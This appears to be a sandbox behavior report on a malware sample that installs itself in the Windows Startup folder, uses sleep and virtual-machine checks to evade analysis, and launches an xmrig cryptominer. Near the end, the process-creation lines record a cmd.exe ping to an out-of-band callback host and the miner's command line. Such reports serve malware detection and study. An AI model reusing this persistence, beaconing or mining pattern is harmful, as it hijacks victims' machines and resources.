Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 6836	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 3060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 4476	Thread sleep count: 1557 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 6788	Thread sleep count: 1041 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 2132	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -599631s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -599329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -598952s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -598822s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -598704s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -598583s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -598464s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -597494s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -597282s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -596907s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -596760s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -596404s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -596242s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -596032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -595700s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -595536s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -595329s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -595157s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -594982s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7208	Thread sleep time: -594304s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 5780	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe TID: 7196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597587	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597107	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594835	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594731	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594612	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594136	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594024	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599631	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 599329	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598822	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598583	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598464	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597494	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596760	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596404	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596242	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 596032	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595700	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595536	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 595157	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594982	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 594304	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: chrtrome22.exe, 00000006.00000002.2077367717.000000001D3FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: xmrig.exe, 00000008.00000002.2911452338.00000253A7E99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW\|
Source: chrtrome22.exe, 00000006.00000002.2077367717.000000001D3FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-0
Source: chrtrome22.exe, 00000001.00000002.1802699525.000000001D530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD0l3Me4
Source: xmrig.exe, 0000000B.00000002.2912600466.0000022D4F2B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: chrtrome22.exe, 00000001.00000002.1802699525.000000001D56C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: chrtrome22.exe, 00000006.00000002.2077367717.000000001D3FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\2
Source: 174.exe, 00000000.00000002.1705380217.0000000005A32000.00000004.00000020.00020000.00000000.sdmp, 174.exe, 00000000.00000002.1705380217.00000000059FD000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 00000008.00000002.2911452338.00000253A7E99000.00000004.00000020.00020000.00000000.sdmp, xmrig.exe, 0000000B.00000002.2912600466.0000022D4F2B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: xmrig.exe, 00000008.00000002.2911452338.00000253A7E99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW .
Source: chrtrome22.exe, 00000001.00000002.1802014191.000000001B8A6000.00000004.00000020.00020000.00000000.sdmp, chrtrome22.exe, 00000006.00000002.2022836615.000000001B886000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\174.exe

Code function: 0_2_00420000 LoadLibraryA,InternetOpenA,InternetOpenUrlA,SHGetFolderPathA,lstrcat,lstrcat,lstrcat,CreateFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ShellExecuteA,ShellExecuteA,ShellExecuteA,exit,

0_2_00420000

Source: C:\Users\user\Desktop\174.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe"	Jump to behavior
Source: C:\Users\user\Desktop\174.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process created: C:\xmrig\xmrig-6.22.2\xmrig.exe "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping wydkowqbjycsuwapzymz9igs0uo3k6tal.oast.fun	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Process created: C:\xmrig\xmrig-6.22.2\xmrig.exe "C:\xmrig\xmrig-6.22.2\xmrig.exe" --config=C:\xmrig\xmrig-6.22.2\config.json	Jump to behavior

Source: conhost.exe, 00000009.00000002.2910093854.000001EEC2EB0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000C.00000002.2912235919.0000018E5F780000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000009.00000002.2910093854.000001EEC2EB0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000C.00000002.2912235919.0000018E5F780000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: conhost.exe, 00000009.00000002.2910093854.000001EEC2EB0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000C.00000002.2912235919.0000018E5F780000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: conhost.exe, 00000009.00000002.2910093854.000001EEC2EB0000.00000002.00000001.00040000.00000000.sdmp, conhost.exe, 0000000C.00000002.2912235919.0000018E5F780000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrtrome22.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
